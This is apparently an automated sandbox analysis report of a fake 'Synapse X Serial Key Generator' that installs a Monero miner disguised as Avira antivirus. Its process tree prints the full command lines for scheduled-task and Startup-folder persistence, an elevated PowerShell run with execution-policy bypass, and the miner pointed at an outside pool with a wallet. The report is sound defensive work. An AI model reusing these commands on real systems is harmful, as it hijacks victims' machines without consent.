Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
24-12-2024 21:52
General
-
Target
Synapse X Serial Key Generator.exe
-
Size
600KB
-
MD5
768b21c1c518aa0258ebf0c3af5c5aaa
-
SHA1
81baff6aae38f8103457d15313166b571623be94
-
SHA256
54490440082d4db95180097552899a6c178d4bb90bba15390ba668088adf867b
-
SHA512
f684171d80146123a2eae78af97b4be318167a9ca4ad17e5c8017cb4f51876eb73c98f41791126d27eb170e032dd291bf28f970db7d5c3e8f23c9381f4a4ebe3
-
SSDEEP
12288:ymkOy/IwEUvC+Q3gwUVN9WCWqsDgpbaN8rO1X3m1PYGapR7pSiha0bKqgqZ6J3N:yfOy0Uq0jiqsEpbVkXgPYFpR7of0bDgl
Malware Config
Signatures
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 1 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Start PowerShell.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Drops file in Program Files directory 12 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 46 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Synapse X Serial Key Generator.exe"C:\Users\Admin\AppData\Local\Temp\Synapse X Serial Key Generator.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-74ICF.tmp\is-41HCR.tmp"C:\Users\Admin\AppData\Local\Temp\is-74ICF.tmp\is-41HCR.tmp" /SL4 $601C8 "C:\Users\Admin\AppData\Local\Temp\Synapse X Serial Key Generator.exe" 380631 522242⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Program Files (x86)\Avira Antivir\avirascan.bat""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeSchtasks.exe /create /F /tn "Avira routine scan" /tr "C:\Program Files (x86)\Avira Antivir\Check for updates.bat" /SC DAILY4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\xcopy.exexcopy /s /y /k /f "C:\Program Files (x86)\Avira Antivir\Check for updates.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Program Files (x86)\Avira Antivir\check for updates.bat""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Avira Antivir\quiet.exe"C:\Program Files (x86)\Avira Antivir\quiet.exe" "C:\Program Files (x86)\Avira Antivir\Updater.bat"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Avira Antivir\Updater.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEPING 127.0.0.1 -n 996⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\SysWOW64\tasklist.exeTASKLIST6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exeFINDSTR /I "Avira_Antivirus.exe"6⤵
- System Location Discovery: System Language Discovery
-
-
C:\Program Files (x86)\Avira Antivir\svchost.exe"C:\Program Files (x86)\Avira Antivir\svchost.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4220.tmp\4221.tmp\4222.bat "C:\Program Files (x86)\Avira Antivir\svchost.exe""7⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Avira Antivir\Avira_Antivirus.exe"C:\Program Files (x86)\Avira Antivir\Avira_Antivirus.exe" -B -t 2 --av=2 -a cryptonight -o stratum+tcp://monero.hashvault.pro:3333 -p x -u 49J1Cj8k5TtErN671Zmn17AanxFGJ2Nfo8iC5NC5BXS8eTxvzm2dgWqASMgJxiDAPxYC4UJK51JnbLTDNdSNNnDEJSwoCvK8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Program Files (x86)\Avira Antivir\Run_Compatibility_test.bat""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process powershell \"-ExecutionPolicy Bypass -NoProfile -Command `\"cd \`\"C:\Program Files (x86)\Avira Antivir\`\"; & \`\".\Compatibility test.ps1\`\"`\"\" -Verb RunAs"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "cd \"C:\Program Files (x86)\Avira Antivir\"; & \".\Compatibility test.ps1\""5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
682KB
MD53716f0ec45591b01acf1c9289b72b0a4
SHA1041ec74ef4c2acee0ff04e4c69789dd9f8b00c14
SHA256ea6439e39c6ca1ec1e00b7f408dc6c15dd9c7af3bec972bcbfb4371802f443bd
SHA51239d1f9b3ab3cc515d77dcc83700c32863c05e6ad97014b0ecd00d7a8ea2b0767f2e4780c9570b69c69b032657524c06def333a2d3c7f64dcc358b89fdb27c724
-
Filesize
304B
MD544a6f57b27b11ae80d9c787214b808d6
SHA128f4ff3c701e136949ebcb617ae0f1a34aa87b04
SHA25685ba142fdf106f20c9581f5db6a7e9276f30507e16cc36fec75eac321dfea04d
SHA512aaa835dd2ae0eb3cb44012ac660ad709323564fe501096d6ede9e031e4f2944396bc412aaa1b3a46f0fa491a6bfef498185b47c93dd3a4e3c24814422d36b33f
-
Filesize
99B
MD5e98eaf489be68539b1e534fbfb887cd7
SHA12eed32f0e1d68bdad2c79f8c962a516ca3c42baf
SHA2568c004e9a1781212c0a81706a28cd4868f47c37af08da41120b6992b33122929e
SHA5120efbec60d68a4d5219b1aaec8c66c412f4f4ccc15b89006d7f0da465c284bd67ec575d7b603332c6d8b768179d666ba95154159f874136001d62c4ed4e393bee
-
Filesize
70B
MD501542a8795f6f1997e33b0bfbea9dd78
SHA1e8f57a9f2793f563670a527b1defc753f09fbac4
SHA25610fbf5b5811b682df16734afd9dccec60581199e7ed0942d76e29b9b174b7b9b
SHA51246234208c315a7e19a7b07bdfb2204d244f68058c7311bb858a656ae1908af32631120b3e26265b981724ee546abe360a017807745d01cfae0fcbec5b77d6138
-
Filesize
207B
MD5b1b5ee8f2b578031841dc89e273224e5
SHA134c89f703a43f37714e2218ed4ae60122d5a1276
SHA25695c95de40de6af56f8c2317a37e5a6c31833d3e9877e100906c71998aff537bc
SHA51274cc0880a8589ff61d45e1eb6a97106336b548b0bb36c0d46a89bf9a1ce818bae80c727e70c36dc270f13f77795a0d61ae10b4715d1096e8900b2e7775575d53
-
Filesize
325B
MD50781fd3b349ab76c9e7cd5390b293288
SHA1df47190a051b8d09bb68c4f58f162dcddefd2d2f
SHA2569dc67ccbb44a3c707b2161d50edca22e616b5afce08e36e5b998ff7322eae247
SHA512098e3bc28368f033e03911dcea5760ec67e26dd9c5642ccc147ee6e297e07876983ec040794bbb0caa4b50c309b119c50a7be4ab36488904c049757963a6e45b
-
Filesize
136KB
MD5935809d393a2bf9f0e886a41ff5b98be
SHA11ed3fc1669115b309624480e88c924b7b67e73bb
SHA256c92904610319843578ada35fb483d219b0d07da69179d57c7e1223cab078492c
SHA51246bccaaba4b8b4cfa247f48b55998d13b37f714ac69f6b08a97b6b8075f61233545406bc9f8db7d2848f1831eeb506da650b72d7d3a2f624e51eccd5fc537bc5
-
Filesize
86KB
MD52eee654c2250c858f6af0f08e65a9241
SHA1879b7f12fd3c80f2a759d44db6c246d83e92977b
SHA256e7286a68156427d2e610e899d4aa3d0e44cdeb00ca710e19298dd7443a3bac48
SHA5126f21e18e8808fd1215e116d782f077193e06cdd0512e6b681cd3c443528e869f88943db89e6973c8a9b12847020dc853249b19b6015cdb7f32fd509d56780879
-
Filesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
Filesize
15KB
MD5f69abcc02bb9290bca726f73d9073b21
SHA1fbdc261b97ddcf0548a4c41335a548ba06bdcb1e
SHA2560b6fde12927c42241040427f78ce05e13bf77916b48be0ca8fe1d2121a7f9359
SHA512601d3d5422be0ec92b61b62e4730f204efc9bc7878237f4100e5a44d87337f69537ff726ae35315c50f8424157eb4a1e2c8f10461a6414f198c63017c1a24f80
-
Filesize
246B
MD5515d11bc1a7e5c32dd84490c21f1a34f
SHA1675de6fe556597590b5987e9cb383ac7fc16204d
SHA256d21c83ee418929ca72c8f8fe0a649f9a78e6ac67cb122826739917cf32feb2ae
SHA512ba69e274e72d6170c9ec7c59afb55b62bed430db5587def5c792b34898b5b09799bfa5fcd48cfff96fc780f207ae5fd3b3d901d1579f99097b0fc316c2813e01
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
652KB
MD5581bb44526a65c02b388e1b8a83fe86c
SHA1dc387f115977b5fb94d9c9084f33a1c231b50acb
SHA256385a9bb48f5180984867f3bff1d327250d22ab4399137b343be291c370ee3699
SHA512aab4cb6dd5ad4ebfded18748c5cd1a4361c154459f36a4cb49e32855b6866f92d3f065cd9cafa16e621a4216bb176f1554a8bbea7fd458b317eb1ff4c3c2bea1
-
Filesize
176KB
-
Filesize
712KB
-
Filesize
712KB
-
Filesize
80KB
-
Filesize
68KB
-
Filesize
40KB
-
Filesize
6.5MB
-
Filesize
652KB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
56KB
-
Filesize
200KB
-
Filesize
104KB
-
Filesize
3.3MB
-
Filesize
32KB
-
Filesize
304KB
-
Filesize
6.2MB
-
Filesize
120KB
-
Filesize
5.6MB
-
Filesize
136KB
-
Filesize
104KB
-
Filesize
600KB
-
Filesize
304KB
-
Filesize
216KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
36KB
-
Filesize
76KB
-
Filesize
76KB